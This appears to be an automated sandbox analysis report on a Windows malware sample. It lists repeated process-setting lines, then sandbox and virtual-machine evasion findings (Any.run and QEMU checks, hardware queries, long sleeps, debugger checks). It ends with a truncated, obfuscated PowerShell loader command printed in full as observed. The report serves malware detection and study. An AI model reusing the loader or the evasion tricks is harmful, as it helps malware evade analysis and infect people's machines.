Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Potential evasive VBS script found (use of timer() function in loop)
Source: Initial file Initial file: do while timer-temp<sec
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7240 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7240 Thread sleep time: -90000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2076 Thread sleep count: 730 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2076 Thread sleep time: -365000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7240 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9239 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window / User API: threadDelayed 730 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe System information queried: ModuleInformation Jump to behavior
Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: CasPol.exe, 00000007.00000002.6648567310.0000000001090000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWU%
Source: CasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process token adjusted: Debug Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CDB5B8 LdrInitializeThunk, 7_2_00CDB5B8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$vildmnd = """saflauconfacgatunistounnli sussemleeaurgltinefrnansfrbanacarirnprsre0st to{ch ir al ud dopcoaserusapeman(th[fosrethorkoibonsagsu]in`$norafenogunihyoopnmeshapfrlinathnstlvaoisvunsel)bo;hu in po fe fo`$didocewilmuiunnphtbaeherjuvsyanalprlgaetorkonifecosdi no=br whnbeetrwko-fjokobthjraeleccotun bebstyentcieko[cu]hu cr(hy`$mrrdreoagviimyobantvskvpeklovaacnfrlslohovsospi.sulabenenwagsmthuhth no/be ze2co)st;pe sk gt mi sufudomerom(cr`$arkublvaiovssetunremiaznteggeeunrgu=al0re;un tr`$spktjldrimesaktsurfoiunncagmeesaric he-falbrtka ac`$tirwieudgudideoranobsskprelmiaprnanlreoalvinsfo.boltrefanprgfrtsthdd;uu sp`$sykfolgoialsextinrtrilinungskeicrre+fl=zi2he)le{ga ys un pa pr te ta il af`$trdbrenolfoisenfotcaebrrduvpeaarlmulinetrrfonshehyssa[re`$rekomlpaidastrtburoritenvegdoedirop/sw2be]em gk=lo co[poconosuntivunemarkrtta]vi:tr:witreorobvgyettwaede(ma`$grrwhefogtuianononbysdiploldeafonprludofovgrsun.pasfoucobdusbrtforclimentugli(ja`$cekmeliciaysaftmirgricinuvgunestrse,fu te2ho)ko,sk ba1ti6va)fl;ga va ar`$undscekelpiirenfltpeedortevstacolfjltreperacnovedisla[ca`$afktalidiklscotskrhyiunnbrgsueasrte/mo2pe]le zo=mi ne(ne`$pidsleaulsuifanmytfjeanrfevteaprlnolkrelurfrnbyethsob[ek`$bakudltriorslatserosichnjegskethrsp/er2mu]bi be-prbmeximoforgr es1sk6st5fr)de;ar kn gi an ma}he vn[resgatakrhaisinlogox]fi[tasmoycoshatpaechmor.untaleabxovtfo.exekvnnocaaomedstihonasgbo]no:bi:tiadisbecgrilaihu.ragcoevitkosvatprrunilansugha(ec`$madexekvlfaiflnbateneporssvfuajalinlinegorexnbiewhsan)eq;pa}st`$rifupokorsksinkminveifandugmesrerliebrsovurelhotidaurtdiektrdesfa0in=sishimufecergotafeprnknsvibheahyreknmissi0fi 